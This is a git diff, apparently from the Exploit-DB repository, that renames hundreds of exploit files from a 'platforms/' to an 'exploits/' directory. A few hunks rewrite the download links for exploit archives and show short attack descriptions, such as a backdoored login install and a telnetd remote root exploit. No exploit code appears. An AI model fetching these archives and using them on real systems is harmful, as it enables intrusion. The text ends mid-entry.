exploits/asp/webapps/7982.txt diff --git a/platforms/asp/webapps/7991.txt b/exploits/asp/webapps/7991.txt similarity index 100% rename from platforms/asp/webapps/7991.txt rename to exploits/asp/webapps/7991.txt diff --git a/platforms/asp/webapps/8048.txt b/exploits/asp/webapps/8048.txt similarity index 100% rename from platforms/asp/webapps/8048.txt rename to exploits/asp/webapps/8048.txt diff --git a/platforms/asp/webapps/8065.txt b/exploits/asp/webapps/8065.txt similarity index 100% rename from platforms/asp/webapps/8065.txt rename to exploits/asp/webapps/8065.txt diff --git a/platforms/asp/webapps/8070.txt b/exploits/asp/webapps/8070.txt similarity index 100% rename from platforms/asp/webapps/8070.txt rename to exploits/asp/webapps/8070.txt diff --git a/platforms/asp/webapps/8107.txt b/exploits/asp/webapps/8107.txt similarity index 100% rename from platforms/asp/webapps/8107.txt rename to exploits/asp/webapps/8107.txt diff --git a/platforms/asp/webapps/8109.txt b/exploits/asp/webapps/8109.txt similarity index 100% rename from platforms/asp/webapps/8109.txt rename to exploits/asp/webapps/8109.txt diff --git a/platforms/asp/webapps/8110.txt b/exploits/asp/webapps/8110.txt similarity index 100% rename from platforms/asp/webapps/8110.txt rename to exploits/asp/webapps/8110.txt diff --git a/platforms/asp/webapps/8111.txt b/exploits/asp/webapps/8111.txt similarity index 100% rename from platforms/asp/webapps/8111.txt rename to exploits/asp/webapps/8111.txt diff --git a/platforms/asp/webapps/8113.txt b/exploits/asp/webapps/8113.txt similarity index 100% rename from platforms/asp/webapps/8113.txt rename to exploits/asp/webapps/8113.txt diff --git a/platforms/asp/webapps/8120.txt b/exploits/asp/webapps/8120.txt similarity index 100% rename from platforms/asp/webapps/8120.txt rename to exploits/asp/webapps/8120.txt diff --git a/platforms/asp/webapps/8130.txt b/exploits/asp/webapps/8130.txt similarity index 100% rename from platforms/asp/webapps/8130.txt rename to exploits/asp/webapps/8130.txt diff --git a/platforms/asp/webapps/8131.txt b/exploits/asp/webapps/8131.txt similarity index 100% rename from platforms/asp/webapps/8131.txt rename to exploits/asp/webapps/8131.txt diff --git a/platforms/asp/webapps/8132.txt b/exploits/asp/webapps/8132.txt similarity index 100% rename from platforms/asp/webapps/8132.txt rename to exploits/asp/webapps/8132.txt diff --git a/platforms/asp/webapps/8307.txt b/exploits/asp/webapps/8307.txt similarity index 100% rename from platforms/asp/webapps/8307.txt rename to exploits/asp/webapps/8307.txt diff --git a/platforms/asp/webapps/8377.pl b/exploits/asp/webapps/8377.pl similarity index 100% rename from platforms/asp/webapps/8377.pl rename to exploits/asp/webapps/8377.pl diff --git a/platforms/asp/webapps/8379.txt b/exploits/asp/webapps/8379.txt similarity index 100% rename from platforms/asp/webapps/8379.txt rename to exploits/asp/webapps/8379.txt diff --git a/platforms/asp/webapps/8397.txt b/exploits/asp/webapps/8397.txt similarity index 100% rename from platforms/asp/webapps/8397.txt rename to exploits/asp/webapps/8397.txt diff --git a/platforms/asp/webapps/8529.txt b/exploits/asp/webapps/8529.txt similarity index 100% rename from platforms/asp/webapps/8529.txt rename to exploits/asp/webapps/8529.txt diff --git a/platforms/asp/webapps/8530.html b/exploits/asp/webapps/8530.html similarity index 100% rename from platforms/asp/webapps/8530.html rename to exploits/asp/webapps/8530.html diff --git a/platforms/asp/webapps/8596.pl b/exploits/asp/webapps/8596.pl similarity index 100% rename from platforms/asp/webapps/8596.pl rename to exploits/asp/webapps/8596.pl diff --git a/platforms/asp/webapps/8610.pl b/exploits/asp/webapps/8610.pl similarity index 100% rename from platforms/asp/webapps/8610.pl rename to exploits/asp/webapps/8610.pl diff --git a/platforms/asp/webapps/8627.txt b/exploits/asp/webapps/8627.txt similarity index 100% rename from platforms/asp/webapps/8627.txt rename to exploits/asp/webapps/8627.txt diff --git a/platforms/asp/webapps/8705.txt b/exploits/asp/webapps/8705.txt similarity index 100% rename from platforms/asp/webapps/8705.txt rename to exploits/asp/webapps/8705.txt diff --git a/platforms/asp/webapps/8719.py b/exploits/asp/webapps/8719.py similarity index 96% rename from platforms/asp/webapps/8719.py rename to exploits/asp/webapps/8719.py index 578f7e9c0..081d7cb1a 100755 --- a/platforms/asp/webapps/8719.py +++ b/exploits/asp/webapps/8719.py @@ -15,7 +15,7 @@ # for working with this exploit you need two asp file for updating hash you can download both from : # www.abysssec.com/files/dana.zip -# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8719.zip (2009-dana.zip) +# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/8719.zip (2009-dana.zip) # then need to upload asp files and change this "http://wwww.yourasphost.com/salt.asp?salt=" in exploit code diff --git a/platforms/asp/webapps/8726.txt b/exploits/asp/webapps/8726.txt similarity index 100% rename from platforms/asp/webapps/8726.txt rename to exploits/asp/webapps/8726.txt diff --git a/platforms/asp/webapps/8734.txt b/exploits/asp/webapps/8734.txt similarity index 100% rename from platforms/asp/webapps/8734.txt rename to exploits/asp/webapps/8734.txt diff --git a/platforms/asp/webapps/8749.txt b/exploits/asp/webapps/8749.txt similarity index 100% rename from platforms/asp/webapps/8749.txt rename to exploits/asp/webapps/8749.txt diff --git a/platforms/asp/webapps/8756.txt b/exploits/asp/webapps/8756.txt similarity index 100% rename from platforms/asp/webapps/8756.txt rename to exploits/asp/webapps/8756.txt diff --git a/platforms/asp/webapps/8785.txt b/exploits/asp/webapps/8785.txt similarity index 100% rename from platforms/asp/webapps/8785.txt rename to exploits/asp/webapps/8785.txt diff --git a/platforms/asp/webapps/8849.txt b/exploits/asp/webapps/8849.txt similarity index 100% rename from platforms/asp/webapps/8849.txt rename to exploits/asp/webapps/8849.txt diff --git a/platforms/asp/webapps/8859.txt b/exploits/asp/webapps/8859.txt similarity index 100% rename from platforms/asp/webapps/8859.txt rename to exploits/asp/webapps/8859.txt diff --git a/platforms/asp/webapps/8889.txt b/exploits/asp/webapps/8889.txt similarity index 100% rename from platforms/asp/webapps/8889.txt rename to exploits/asp/webapps/8889.txt diff --git a/platforms/asp/webapps/8890.txt b/exploits/asp/webapps/8890.txt similarity index 100% rename from platforms/asp/webapps/8890.txt rename to exploits/asp/webapps/8890.txt diff --git a/platforms/asp/webapps/925.txt b/exploits/asp/webapps/925.txt similarity index 100% rename from platforms/asp/webapps/925.txt rename to exploits/asp/webapps/925.txt diff --git a/platforms/asp/webapps/9328.txt b/exploits/asp/webapps/9328.txt similarity index 100% rename from platforms/asp/webapps/9328.txt rename to exploits/asp/webapps/9328.txt diff --git a/platforms/asp/webapps/9562.txt b/exploits/asp/webapps/9562.txt similarity index 100% rename from platforms/asp/webapps/9562.txt rename to exploits/asp/webapps/9562.txt diff --git a/platforms/asp/webapps/9612.txt b/exploits/asp/webapps/9612.txt similarity index 100% rename from platforms/asp/webapps/9612.txt rename to exploits/asp/webapps/9612.txt diff --git a/platforms/asp/webapps/9675.txt b/exploits/asp/webapps/9675.txt similarity index 100% rename from platforms/asp/webapps/9675.txt rename to exploits/asp/webapps/9675.txt diff --git a/platforms/asp/webapps/9809.txt b/exploits/asp/webapps/9809.txt similarity index 100% rename from platforms/asp/webapps/9809.txt rename to exploits/asp/webapps/9809.txt diff --git a/platforms/asp/webapps/9834.txt b/exploits/asp/webapps/9834.txt similarity index 100% rename from platforms/asp/webapps/9834.txt rename to exploits/asp/webapps/9834.txt diff --git a/platforms/asp/webapps/9841.txt b/exploits/asp/webapps/9841.txt similarity index 100% rename from platforms/asp/webapps/9841.txt rename to exploits/asp/webapps/9841.txt diff --git a/platforms/asp/webapps/9856.txt b/exploits/asp/webapps/9856.txt similarity index 100% rename from platforms/asp/webapps/9856.txt rename to exploits/asp/webapps/9856.txt diff --git a/platforms/asp/webapps/9857.txt b/exploits/asp/webapps/9857.txt similarity index 100% rename from platforms/asp/webapps/9857.txt rename to exploits/asp/webapps/9857.txt diff --git a/platforms/asp/webapps/9877.txt b/exploits/asp/webapps/9877.txt similarity index 100% rename from platforms/asp/webapps/9877.txt rename to exploits/asp/webapps/9877.txt diff --git a/platforms/asp/webapps/9904.txt b/exploits/asp/webapps/9904.txt similarity index 100% rename from platforms/asp/webapps/9904.txt rename to exploits/asp/webapps/9904.txt diff --git a/platforms/asp/webapps/9963.txt b/exploits/asp/webapps/9963.txt similarity index 100% rename from platforms/asp/webapps/9963.txt rename to exploits/asp/webapps/9963.txt diff --git a/platforms/asp/webapps/9967.txt b/exploits/asp/webapps/9967.txt similarity index 100% rename from platforms/asp/webapps/9967.txt rename to exploits/asp/webapps/9967.txt diff --git a/platforms/aspx/webapps/40397.txt b/exploits/aspx/webapps/40397.txt similarity index 100% rename from platforms/aspx/webapps/40397.txt rename to exploits/aspx/webapps/40397.txt diff --git a/platforms/aspx/webapps/40407.txt b/exploits/aspx/webapps/40407.txt similarity index 100% rename from platforms/aspx/webapps/40407.txt rename to exploits/aspx/webapps/40407.txt diff --git a/platforms/aspx/webapps/41086.txt b/exploits/aspx/webapps/41086.txt similarity index 100% rename from platforms/aspx/webapps/41086.txt rename to exploits/aspx/webapps/41086.txt diff --git a/platforms/aspx/webapps/41618.txt b/exploits/aspx/webapps/41618.txt similarity index 100% rename from platforms/aspx/webapps/41618.txt rename to exploits/aspx/webapps/41618.txt diff --git a/platforms/aspx/webapps/41985.txt b/exploits/aspx/webapps/41985.txt similarity index 100% rename from platforms/aspx/webapps/41985.txt rename to exploits/aspx/webapps/41985.txt diff --git a/platforms/aspx/webapps/41986.txt b/exploits/aspx/webapps/41986.txt similarity index 100% rename from platforms/aspx/webapps/41986.txt rename to exploits/aspx/webapps/41986.txt diff --git a/platforms/aspx/webapps/42184.txt b/exploits/aspx/webapps/42184.txt similarity index 100% rename from platforms/aspx/webapps/42184.txt rename to exploits/aspx/webapps/42184.txt diff --git a/platforms/aspx/webapps/42687.txt b/exploits/aspx/webapps/42687.txt similarity index 100% rename from platforms/aspx/webapps/42687.txt rename to exploits/aspx/webapps/42687.txt diff --git a/platforms/aspx/webapps/42923.txt b/exploits/aspx/webapps/42923.txt similarity index 100% rename from platforms/aspx/webapps/42923.txt rename to exploits/aspx/webapps/42923.txt diff --git a/platforms/aspx/webapps/43149.txt b/exploits/aspx/webapps/43149.txt similarity index 100% rename from platforms/aspx/webapps/43149.txt rename to exploits/aspx/webapps/43149.txt diff --git a/platforms/atheos/local/21282.c b/exploits/atheos/local/21282.c similarity index 100% rename from platforms/atheos/local/21282.c rename to exploits/atheos/local/21282.c diff --git a/platforms/beos/dos/19938.txt b/exploits/beos/dos/19938.txt similarity index 100% rename from platforms/beos/dos/19938.txt rename to exploits/beos/dos/19938.txt diff --git a/platforms/beos/local/19840.txt b/exploits/beos/local/19840.txt similarity index 88% rename from platforms/beos/local/19840.txt rename to exploits/beos/local/19840.txt index 27af71dd0..f0291f23f 100644 --- a/platforms/beos/local/19840.txt +++ b/exploits/beos/local/19840.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1098/info A direct system call containing invalid parameters through int 0x25 will cause the BeOS to crash. Reboot of the machine is required in order to regain normal functionality. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19840.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19840.tgz \ No newline at end of file diff --git a/platforms/beos/local/19841.casl b/exploits/beos/local/19841.casl similarity index 100% rename from platforms/beos/local/19841.casl rename to exploits/beos/local/19841.casl diff --git a/platforms/beos/remote/20404.txt b/exploits/beos/remote/20404.txt similarity index 100% rename from platforms/beos/remote/20404.txt rename to exploits/beos/remote/20404.txt diff --git a/platforms/bsd/dos/10185.txt b/exploits/bsd/dos/10185.txt similarity index 100% rename from platforms/bsd/dos/10185.txt rename to exploits/bsd/dos/10185.txt diff --git a/platforms/bsd/dos/10186.txt b/exploits/bsd/dos/10186.txt similarity index 100% rename from platforms/bsd/dos/10186.txt rename to exploits/bsd/dos/10186.txt diff --git a/platforms/bsd/dos/10187.txt b/exploits/bsd/dos/10187.txt similarity index 100% rename from platforms/bsd/dos/10187.txt rename to exploits/bsd/dos/10187.txt diff --git a/platforms/bsd/dos/14947.txt b/exploits/bsd/dos/14947.txt similarity index 100% rename from platforms/bsd/dos/14947.txt rename to exploits/bsd/dos/14947.txt diff --git a/platforms/bsd/dos/1540.pl b/exploits/bsd/dos/1540.pl similarity index 100% rename from platforms/bsd/dos/1540.pl rename to exploits/bsd/dos/1540.pl diff --git a/platforms/bsd/dos/16064.c b/exploits/bsd/dos/16064.c similarity index 100% rename from platforms/bsd/dos/16064.c rename to exploits/bsd/dos/16064.c diff --git a/platforms/bsd/dos/17097.c b/exploits/bsd/dos/17097.c similarity index 100% rename from platforms/bsd/dos/17097.c rename to exploits/bsd/dos/17097.c diff --git a/platforms/bsd/dos/19117.c b/exploits/bsd/dos/19117.c similarity index 100% rename from platforms/bsd/dos/19117.c rename to exploits/bsd/dos/19117.c diff --git a/platforms/bsd/dos/19423.c b/exploits/bsd/dos/19423.c similarity index 100% rename from platforms/bsd/dos/19423.c rename to exploits/bsd/dos/19423.c diff --git a/platforms/bsd/dos/19488.c b/exploits/bsd/dos/19488.c similarity index 100% rename from platforms/bsd/dos/19488.c rename to exploits/bsd/dos/19488.c diff --git a/platforms/bsd/dos/19564.c b/exploits/bsd/dos/19564.c similarity index 100% rename from platforms/bsd/dos/19564.c rename to exploits/bsd/dos/19564.c diff --git a/platforms/bsd/dos/19896.c b/exploits/bsd/dos/19896.c similarity index 100% rename from platforms/bsd/dos/19896.c rename to exploits/bsd/dos/19896.c diff --git a/platforms/bsd/dos/19982.c b/exploits/bsd/dos/19982.c similarity index 100% rename from platforms/bsd/dos/19982.c rename to exploits/bsd/dos/19982.c diff --git a/platforms/bsd/dos/21077.c b/exploits/bsd/dos/21077.c similarity index 100% rename from platforms/bsd/dos/21077.c rename to exploits/bsd/dos/21077.c diff --git a/platforms/bsd/dos/2524.c b/exploits/bsd/dos/2524.c similarity index 100% rename from platforms/bsd/dos/2524.c rename to exploits/bsd/dos/2524.c diff --git a/platforms/bsd/dos/2541.c b/exploits/bsd/dos/2541.c similarity index 100% rename from platforms/bsd/dos/2541.c rename to exploits/bsd/dos/2541.c diff --git a/platforms/bsd/dos/2542.c b/exploits/bsd/dos/2542.c similarity index 100% rename from platforms/bsd/dos/2542.c rename to exploits/bsd/dos/2542.c diff --git a/platforms/bsd/dos/2639.c b/exploits/bsd/dos/2639.c similarity index 100% rename from platforms/bsd/dos/2639.c rename to exploits/bsd/dos/2639.c diff --git a/platforms/bsd/dos/2874.pl b/exploits/bsd/dos/2874.pl similarity index 100% rename from platforms/bsd/dos/2874.pl rename to exploits/bsd/dos/2874.pl diff --git a/platforms/bsd/dos/31333.txt b/exploits/bsd/dos/31333.txt similarity index 100% rename from platforms/bsd/dos/31333.txt rename to exploits/bsd/dos/31333.txt diff --git a/platforms/bsd/dos/31550.c b/exploits/bsd/dos/31550.c similarity index 100% rename from platforms/bsd/dos/31550.c rename to exploits/bsd/dos/31550.c diff --git a/platforms/bsd/dos/33318.txt b/exploits/bsd/dos/33318.txt similarity index 100% rename from platforms/bsd/dos/33318.txt rename to exploits/bsd/dos/33318.txt diff --git a/platforms/bsd/dos/33319.txt b/exploits/bsd/dos/33319.txt similarity index 100% rename from platforms/bsd/dos/33319.txt rename to exploits/bsd/dos/33319.txt diff --git a/platforms/bsd/dos/33708.c b/exploits/bsd/dos/33708.c similarity index 100% rename from platforms/bsd/dos/33708.c rename to exploits/bsd/dos/33708.c diff --git a/platforms/bsd/dos/343.c b/exploits/bsd/dos/343.c similarity index 100% rename from platforms/bsd/dos/343.c rename to exploits/bsd/dos/343.c diff --git a/platforms/bsd/dos/35058.c b/exploits/bsd/dos/35058.c similarity index 100% rename from platforms/bsd/dos/35058.c rename to exploits/bsd/dos/35058.c diff --git a/platforms/bsd/dos/36799.c b/exploits/bsd/dos/36799.c similarity index 100% rename from platforms/bsd/dos/36799.c rename to exploits/bsd/dos/36799.c diff --git a/platforms/bsd/dos/38059.c b/exploits/bsd/dos/38059.c similarity index 100% rename from platforms/bsd/dos/38059.c rename to exploits/bsd/dos/38059.c diff --git a/platforms/bsd/dos/4935.c b/exploits/bsd/dos/4935.c similarity index 100% rename from platforms/bsd/dos/4935.c rename to exploits/bsd/dos/4935.c diff --git a/platforms/bsd/dos/8163.txt b/exploits/bsd/dos/8163.txt similarity index 100% rename from platforms/bsd/dos/8163.txt rename to exploits/bsd/dos/8163.txt diff --git a/platforms/bsd/dos/8581.txt b/exploits/bsd/dos/8581.txt similarity index 100% rename from platforms/bsd/dos/8581.txt rename to exploits/bsd/dos/8581.txt diff --git a/platforms/bsd/dos/869.c b/exploits/bsd/dos/869.c similarity index 100% rename from platforms/bsd/dos/869.c rename to exploits/bsd/dos/869.c diff --git a/platforms/bsd/local/10255.txt b/exploits/bsd/local/10255.txt similarity index 100% rename from platforms/bsd/local/10255.txt rename to exploits/bsd/local/10255.txt diff --git a/platforms/bsd/local/1087.c b/exploits/bsd/local/1087.c similarity index 100% rename from platforms/bsd/local/1087.c rename to exploits/bsd/local/1087.c diff --git a/platforms/bsd/local/118.c b/exploits/bsd/local/118.c similarity index 100% rename from platforms/bsd/local/118.c rename to exploits/bsd/local/118.c diff --git a/platforms/bsd/local/1230.sh b/exploits/bsd/local/1230.sh similarity index 100% rename from platforms/bsd/local/1230.sh rename to exploits/bsd/local/1230.sh diff --git a/platforms/bsd/local/125.c b/exploits/bsd/local/125.c similarity index 100% rename from platforms/bsd/local/125.c rename to exploits/bsd/local/125.c diff --git a/platforms/bsd/local/1311.c b/exploits/bsd/local/1311.c similarity index 100% rename from platforms/bsd/local/1311.c rename to exploits/bsd/local/1311.c diff --git a/platforms/bsd/local/14406.pl b/exploits/bsd/local/14406.pl similarity index 100% rename from platforms/bsd/local/14406.pl rename to exploits/bsd/local/14406.pl diff --git a/platforms/bsd/local/15206.c b/exploits/bsd/local/15206.c similarity index 100% rename from platforms/bsd/local/15206.c rename to exploits/bsd/local/15206.c diff --git a/platforms/bsd/local/16951.c b/exploits/bsd/local/16951.c similarity index 100% rename from platforms/bsd/local/16951.c rename to exploits/bsd/local/16951.c diff --git a/platforms/bsd/local/17169.pl b/exploits/bsd/local/17169.pl similarity index 100% rename from platforms/bsd/local/17169.pl rename to exploits/bsd/local/17169.pl diff --git a/platforms/bsd/local/19411.txt b/exploits/bsd/local/19411.txt similarity index 96% rename from platforms/bsd/local/19411.txt rename to exploits/bsd/local/19411.txt index 5ff9784f3..4a6bf4c40 100644 --- a/platforms/bsd/local/19411.txt +++ b/exploits/bsd/local/19411.txt @@ -10,4 +10,4 @@ Hacker writes directly to device previously mounted as /usr, clearing file flags Hacker mounts modified device as /usr. Hacker installs backdoored /usr/bin/login. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19411.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19411.tgz \ No newline at end of file diff --git a/platforms/bsd/local/19545.c b/exploits/bsd/local/19545.c similarity index 100% rename from platforms/bsd/local/19545.c rename to exploits/bsd/local/19545.c diff --git a/platforms/bsd/local/19726.c b/exploits/bsd/local/19726.c similarity index 100% rename from platforms/bsd/local/19726.c rename to exploits/bsd/local/19726.c diff --git a/platforms/bsd/local/200.c b/exploits/bsd/local/200.c similarity index 100% rename from platforms/bsd/local/200.c rename to exploits/bsd/local/200.c diff --git a/platforms/bsd/local/20191.c b/exploits/bsd/local/20191.c similarity index 100% rename from platforms/bsd/local/20191.c rename to exploits/bsd/local/20191.c diff --git a/platforms/bsd/local/202.c b/exploits/bsd/local/202.c similarity index 100% rename from platforms/bsd/local/202.c rename to exploits/bsd/local/202.c diff --git a/platforms/bsd/local/207.c b/exploits/bsd/local/207.c similarity index 100% rename from platforms/bsd/local/207.c rename to exploits/bsd/local/207.c diff --git a/platforms/bsd/local/21407.c b/exploits/bsd/local/21407.c similarity index 100% rename from platforms/bsd/local/21407.c rename to exploits/bsd/local/21407.c diff --git a/platforms/bsd/local/21669.pl b/exploits/bsd/local/21669.pl similarity index 100% rename from platforms/bsd/local/21669.pl rename to exploits/bsd/local/21669.pl diff --git a/platforms/bsd/local/21881.txt b/exploits/bsd/local/21881.txt similarity index 100% rename from platforms/bsd/local/21881.txt rename to exploits/bsd/local/21881.txt diff --git a/platforms/bsd/local/22811.c b/exploits/bsd/local/22811.c similarity index 100% rename from platforms/bsd/local/22811.c rename to exploits/bsd/local/22811.c diff --git a/platforms/bsd/local/23062.c b/exploits/bsd/local/23062.c similarity index 100% rename from platforms/bsd/local/23062.c rename to exploits/bsd/local/23062.c diff --git a/platforms/bsd/local/23063.c b/exploits/bsd/local/23063.c similarity index 100% rename from platforms/bsd/local/23063.c rename to exploits/bsd/local/23063.c diff --git a/platforms/bsd/local/23655.txt b/exploits/bsd/local/23655.txt similarity index 88% rename from platforms/bsd/local/23655.txt rename to exploits/bsd/local/23655.txt index af300446d..d2a7a2513 100644 --- a/platforms/bsd/local/23655.txt +++ b/exploits/bsd/local/23655.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9586/info A vulnerability has been reported to reside in the 'shmat()' system call used in the BSD kernel. Exploiting this issue may allow a local attacker to inject instructions into the memory of a privileged process. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23655.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23655.tar.gz \ No newline at end of file diff --git a/platforms/bsd/local/24015.c b/exploits/bsd/local/24015.c similarity index 100% rename from platforms/bsd/local/24015.c rename to exploits/bsd/local/24015.c diff --git a/platforms/bsd/local/24113.c b/exploits/bsd/local/24113.c similarity index 100% rename from platforms/bsd/local/24113.c rename to exploits/bsd/local/24113.c diff --git a/platforms/bsd/local/243.c b/exploits/bsd/local/243.c similarity index 100% rename from platforms/bsd/local/243.c rename to exploits/bsd/local/243.c diff --git a/platforms/bsd/local/286.c b/exploits/bsd/local/286.c similarity index 100% rename from platforms/bsd/local/286.c rename to exploits/bsd/local/286.c diff --git a/platforms/bsd/local/287.c b/exploits/bsd/local/287.c similarity index 100% rename from platforms/bsd/local/287.c rename to exploits/bsd/local/287.c diff --git a/platforms/bsd/local/29.c b/exploits/bsd/local/29.c similarity index 100% rename from platforms/bsd/local/29.c rename to exploits/bsd/local/29.c diff --git a/platforms/bsd/local/30484.txt b/exploits/bsd/local/30484.txt similarity index 100% rename from platforms/bsd/local/30484.txt rename to exploits/bsd/local/30484.txt diff --git a/platforms/bsd/local/3094.c b/exploits/bsd/local/3094.c similarity index 100% rename from platforms/bsd/local/3094.c rename to exploits/bsd/local/3094.c diff --git a/platforms/bsd/local/33229.c b/exploits/bsd/local/33229.c similarity index 100% rename from platforms/bsd/local/33229.c rename to exploits/bsd/local/33229.c diff --git a/platforms/bsd/local/3578.c b/exploits/bsd/local/3578.c similarity index 100% rename from platforms/bsd/local/3578.c rename to exploits/bsd/local/3578.c diff --git a/platforms/bsd/local/36296.pl b/exploits/bsd/local/36296.pl similarity index 100% rename from platforms/bsd/local/36296.pl rename to exploits/bsd/local/36296.pl diff --git a/platforms/bsd/local/38347.rb b/exploits/bsd/local/38347.rb similarity index 100% rename from platforms/bsd/local/38347.rb rename to exploits/bsd/local/38347.rb diff --git a/platforms/bsd/local/396.c b/exploits/bsd/local/396.c similarity index 100% rename from platforms/bsd/local/396.c rename to exploits/bsd/local/396.c diff --git a/platforms/bsd/local/40141.c b/exploits/bsd/local/40141.c similarity index 100% rename from platforms/bsd/local/40141.c rename to exploits/bsd/local/40141.c diff --git a/platforms/bsd/local/579.sh b/exploits/bsd/local/579.sh similarity index 100% rename from platforms/bsd/local/579.sh rename to exploits/bsd/local/579.sh diff --git a/platforms/bsd/local/739.c b/exploits/bsd/local/739.c similarity index 100% rename from platforms/bsd/local/739.c rename to exploits/bsd/local/739.c diff --git a/platforms/bsd/remote/10035.rb b/exploits/bsd/remote/10035.rb similarity index 100% rename from platforms/bsd/remote/10035.rb rename to exploits/bsd/remote/10035.rb diff --git a/platforms/bsd/remote/105.pl b/exploits/bsd/remote/105.pl similarity index 100% rename from platforms/bsd/remote/105.pl rename to exploits/bsd/remote/105.pl diff --git a/platforms/bsd/remote/1234.c b/exploits/bsd/remote/1234.c similarity index 100% rename from platforms/bsd/remote/1234.c rename to exploits/bsd/remote/1234.c diff --git a/platforms/bsd/remote/18369.rb b/exploits/bsd/remote/18369.rb similarity index 100% rename from platforms/bsd/remote/18369.rb rename to exploits/bsd/remote/18369.rb diff --git a/platforms/bsd/remote/19039.txt b/exploits/bsd/remote/19039.txt similarity index 100% rename from platforms/bsd/remote/19039.txt rename to exploits/bsd/remote/19039.txt diff --git a/platforms/bsd/remote/19520.txt b/exploits/bsd/remote/19520.txt similarity index 93% rename from platforms/bsd/remote/19520.txt rename to exploits/bsd/remote/19520.txt index dd623f583..303f55feb 100644 --- a/platforms/bsd/remote/19520.txt +++ b/exploits/bsd/remote/19520.txt @@ -3,7 +3,7 @@ This exploit was leaked on the Full Disclosure mailing list: http://seclists.org/fulldisclosure/2012/Jun/404 -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19520.zip +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19520.zip BSD telnetd Remote Root Exploit *ZERODAY* diff --git a/platforms/bsd/remote/19924.c b/exploits/bsd/remote/19924.c similarity index 100% rename from platforms/bsd/remote/19924.c rename to exploits/bsd/remote/19924.c diff --git a/platforms/bsd/remote/20731.c b/exploits/bsd/remote/20731.c similarity index 100% rename from platforms/bsd/remote/20731.c rename to exploits/bsd/remote/20731.c diff --git a/platforms/bsd/remote/21440.c b/exploits/bsd/remote/21440.c similarity index 100% rename from platforms/bsd/remote/21440.c rename to exploits/bsd/remote/21440.c diff --git a/platforms/bsd/remote/22131.pl b/exploits/bsd/remote/22131.pl similarity index 100% rename from platforms/bsd/remote/22131.pl rename to exploits/bsd/remote/22131.pl diff --git a/platforms/bsd/remote/228.c b/exploits/bsd/remote/228.c similarity index 100% rename from platforms/bsd/remote/228.c rename to exploits/bsd/remote/228.c diff --git a/platforms/bsd/remote/234.c b/exploits/bsd/remote/234.c similarity index 100% rename from platforms/bsd/remote/234.c rename to exploits/bsd/remote/234.c diff --git a/platforms/bsd/remote/3491.py b/exploits/bsd/remote/3491.py similarity index 100% rename from platforms/bsd/remote/3491.py rename to exploits/bsd/remote/3491.py diff --git a/platforms/bsd/remote/35180.rb b/exploits/bsd/remote/35180.rb similarity index 100% rename from platforms/bsd/remote/35180.rb rename to exploits/bsd/remote/35180.rb diff --git a/platforms/bsd/remote/35427.py b/exploits/bsd/remote/35427.py similarity index 100% rename from platforms/bsd/remote/35427.py rename to exploits/bsd/remote/35427.py diff --git a/platforms/bsd/remote/35919.c b/exploits/bsd/remote/35919.c similarity index 100% rename from platforms/bsd/remote/35919.c rename to exploits/bsd/remote/35919.c diff --git a/platforms/bsd/remote/38346.rb b/exploits/bsd/remote/38346.rb similarity index 100% rename from platforms/bsd/remote/38346.rb rename to exploits/bsd/remote/38346.rb diff --git a/platforms/bsd/remote/409.c b/exploits/bsd/remote/409.c similarity index 100% rename from platforms/bsd/remote/409.c rename to exploits/bsd/remote/409.c diff --git a/platforms/bsd/remote/432.c b/exploits/bsd/remote/432.c similarity index 100% rename from platforms/bsd/remote/432.c rename to exploits/bsd/remote/432.c diff --git a/platforms/bsd_x86/remote/16880.rb b/exploits/bsd_x86/remote/16880.rb similarity index 100% rename from platforms/bsd_x86/remote/16880.rb rename to exploits/bsd_x86/remote/16880.rb diff --git a/platforms/cfm/dos/28100.txt b/exploits/cfm/dos/28100.txt similarity index 100% rename from platforms/cfm/dos/28100.txt rename to exploits/cfm/dos/28100.txt diff --git a/platforms/cfm/remote/21548.txt b/exploits/cfm/remote/21548.txt similarity index 100% rename from platforms/cfm/remote/21548.txt rename to exploits/cfm/remote/21548.txt diff --git a/platforms/cfm/webapps/15120.txt b/exploits/cfm/webapps/15120.txt similarity index 100% rename from platforms/cfm/webapps/15120.txt rename to exploits/cfm/webapps/15120.txt diff --git a/platforms/cfm/webapps/16171.py b/exploits/cfm/webapps/16171.py similarity index 100% rename from platforms/cfm/webapps/16171.py rename to exploits/cfm/webapps/16171.py diff --git a/platforms/cfm/webapps/16225.txt b/exploits/cfm/webapps/16225.txt similarity index 100% rename from platforms/cfm/webapps/16225.txt rename to exploits/cfm/webapps/16225.txt diff --git a/platforms/cfm/webapps/16788.rb b/exploits/cfm/webapps/16788.rb similarity index 100% rename from platforms/cfm/webapps/16788.rb rename to exploits/cfm/webapps/16788.rb diff --git a/platforms/cfm/webapps/21493.txt b/exploits/cfm/webapps/21493.txt similarity index 100% rename from platforms/cfm/webapps/21493.txt rename to exploits/cfm/webapps/21493.txt diff --git a/platforms/cfm/webapps/22486.txt b/exploits/cfm/webapps/22486.txt similarity index 100% rename from platforms/cfm/webapps/22486.txt rename to exploits/cfm/webapps/22486.txt diff --git a/platforms/cfm/webapps/22544.txt b/exploits/cfm/webapps/22544.txt similarity index 100% rename from platforms/cfm/webapps/22544.txt rename to exploits/cfm/webapps/22544.txt diff --git a/platforms/cfm/webapps/23256.txt b/exploits/cfm/webapps/23256.txt similarity index 100% rename from platforms/cfm/webapps/23256.txt rename to exploits/cfm/webapps/23256.txt diff --git a/platforms/cfm/webapps/24081.txt b/exploits/cfm/webapps/24081.txt similarity index 100% rename from platforms/cfm/webapps/24081.txt rename to exploits/cfm/webapps/24081.txt diff --git a/platforms/cfm/webapps/24680.txt b/exploits/cfm/webapps/24680.txt similarity index 100% rename from platforms/cfm/webapps/24680.txt rename to exploits/cfm/webapps/24680.txt diff --git a/platforms/cfm/webapps/25982.txt 